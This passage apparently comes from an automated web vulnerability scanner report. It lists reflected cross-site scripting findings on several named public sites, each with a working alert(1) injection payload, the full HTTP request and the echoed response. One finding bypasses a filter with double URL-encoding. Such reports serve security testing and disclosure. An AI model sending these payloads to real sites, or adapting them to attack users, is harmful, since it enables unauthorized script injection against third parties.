P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DMa383e"><script>alert(1)</script>608b3697d30/DLX/177984454/x96/default/empty.gif/726348573830302b506b73414233784a?x" target="_top"><IMG SRC=
...[SNIP]...

4.177. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dedf"><script>alert(1)</script>4b75d2381cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX1dedf"><script>alert(1)</script>4b75d2381cc/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:07:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+PlQAC6bl; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX1dedf"><script>alert(1)</script>4b75d2381cc/836748510/x96/default/empty.gif/726348573830302b506c51414336626c?x" target="_top"><IMG SRC=
...[SNIP]...

4.178. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac08c"><script>alert(1)</script>2742344f814 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x96ac08c"><script>alert(1)</script>2742344f814 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:07:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+Pl0ADgGc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1154087751/x96ac08c"><script>alert(1)</script>2742344f814/default/empty.gif/726348573830302b506c304144674763?x" target="_top"><IMG SRC
...[SNIP]...

4.179. http://openports.se/news/aub/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://openports.se
Path:   /news/aub/x22

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da8e"-alert(1)-"cced135207a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news5da8e"-alert(1)-"cced135207a/aub/x22 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11500


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "http://openports.se/view_port.php?path=/news5da8e"-alert(1)-"cced135207a/aub/x22";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escap
...[SNIP]...

4.180. http://openports.se/news/aub/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://openports.se
Path:   /news/aub/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db95b"><script>alert(1)</script>12bc1ff0ef5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/aubdb95b"><script>alert(1)</script>12bc1ff0ef5/x22 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
<a href="http://openports.se/news/aubdb95b"><script>alert(1)</script>12bc1ff0ef5/x22">
...[SNIP]...

4.181. http://openports.se/news/aub/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://openports.se
Path:   /news/aub/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5972f"-alert(1)-"a9f703dfef8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/aub5972f"-alert(1)-"a9f703dfef8/x22 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
arget_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "http://openports.se/view_port.php?path=/news/aub5972f"-alert(1)-"a9f703dfef8/x22";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sa
...[SNIP]...

4.182. http://openports.se/news/aub/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://openports.se
Path:   /news/aub/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3971d"><script>alert(1)</script>61eba753576 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/aub/x223971d"><script>alert(1)</script>61eba753576 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
<a href="http://openports.se/news/aub/x223971d"><script>alert(1)</script>61eba753576">
...[SNIP]...

4.183. http://openports.se/news/aub/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://openports.se
Path:   /news/aub/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efd55"-alert(1)-"8cf2fde9a94 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/aub/x22efd55"-alert(1)-"8cf2fde9a94 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
t_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "http://openports.se/view_port.php?path=/news/aub/x22efd55"-alert(1)-"8cf2fde9a94";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

4.184. http://openports.se/news/aub/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://openports.se
Path:   /news/aub/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d2c2"-alert(1)-"86792ffaf77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/aub/x22?5d2c2"-alert(1)-"86792ffaf77=1 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11713


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "http://openports.se/view_port.php?path=/news/aub/x22?5d2c2"-alert(1)-"86792ffaf77=1";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(saja
...[SNIP]...

4.185. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html [groupid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The value of the groupid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d was submitted in the groupid parameter. This input was echoed as 1e57e\"><script>alert(1)</script>e630941430d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the groupid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d; expires=Tue, 25-Jan-2011 22:48:53 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:48:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<a href="/groups/viewgroup/7141e57e\"><script>alert(1)</script>e630941430d-.html">
...[SNIP]...

4.186. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload c4594<script>alert(1)</script>2bd00b98417 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1295919341357&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1189370408998555&slotname=Joomla_JoomlacodeSidec4594<script>alert(1)</script>2bd00b98417&page_slots=Joomla_JoomlacodeSide&cookie=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&ga_vid=760811261.1295919318&ga_sid=1295919318&ga_hid=560912139&ga_fc=true&url=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&ref=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Ftracker%2F%3F3ee00%2522style%253d%2522x%253aexpression(alert(1))%2522744e3c5545f%3D1&lmt=1295940941&dt=1295919341362&cc=12&biw=1155&bih=1012&ifi=1&adk=4176925214&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/reporting/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 03:09:13 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2572

GA_googleSetAdContentsBySlotForSync({"Joomla_JoomlacodeSidec4594<script>alert(1)</script>2bd00b98417":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

4.187. http://sourceforge.net/softwaremap/ [fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /softwaremap/

Issue detail

The value of the fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bf8b"><script>alert(1)</script>21a82293602 was submitted in the fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /softwaremap/?fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x223bf8b"><script>alert(1)</script>21a82293602 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-8
Set-Cookie: PHPSESSID=ff34ad02dd9584709c9cbdfe4f2a5448; expires=Mon, 07-Feb-2011 16:03:31 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:03:31 GMT
Server: lighttpd/1.4.26
Content-Length: 108116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Create Server: sfs-web-8 -->
<!--
~ SourceForge.net: Find and B
...[SNIP]...
<a href="/softwaremap/?fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x223bf8b"><script>alert(1)</script>21a82293602&fq%5B%5D=trove%3A688">
...[SNIP]...

4.188. http://sourceforge.net/softwaremap/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /softwaremap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3f06"><script>alert(1)</script>8a4aedca02f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /softwaremap/?a3f06"><script>alert(1)</script>8a4aedca02f=1 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-5
Set-Cookie: PHPSESSID=8d43df6a56cf06198a62868d1753fde0; expires=Mon, 07-Feb-2011 16:03:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:03:05 GMT
Server: lighttpd/1.4.26
Content-Length: 86066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Create Server: sfs-web-5 -->
<!--
~ SourceForge.net: Find and B
...[SNIP]...
<a href="/softwaremap/?a3f06"><script>alert(1)</script>8a4aedca02f=1&fq%5B%5D=trove%3A688">
...[SNIP]...

4.189. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a960d"><script>alert(1)</script>b7d5247b69c was submitted in the REST URL parameter 1. This input was echoed as a960d\"><script>alert(1)</script>b7d5247b69c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scenea960d"><script>alert(1)</script>b7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l9al9g2s3e29u7v3gna9e669j0; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:03:34 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:03:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scenea960d\"><script>alert(1)</script>b7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22'; }); return true;" >
...[SNIP]...

4.190. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81402"><script>alert(1)</script>a730c9df6b2 was submitted in the REST URL parameter 2. This input was echoed as 81402\"><script>alert(1)</script>a730c9df6b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scene/201081402"><script>alert(1)</script>a730c9df6b2/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=n8hb7utbvn3u89gr4auv5dm5f3; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:03:52 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:03:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/201081402\"><script>alert(1)</script>a730c9df6b2/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22'; }); return true;" >
...[SNIP]...

4.191. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df173"><script>alert(1)</script>06915548014 was submitted in the REST URL parameter 3. This input was echoed as df173\"><script>alert(1)</script>06915548014 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scene/2010/11df173"><script>alert(1)</script>06915548014/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=mnk1ekv0l7qhvftnveimin27t7; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:04:11 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:04:11 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scene/2010/11df173\"><script>alert(1)</script>06915548014/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22'; }); return true;" >
...[SNIP]...

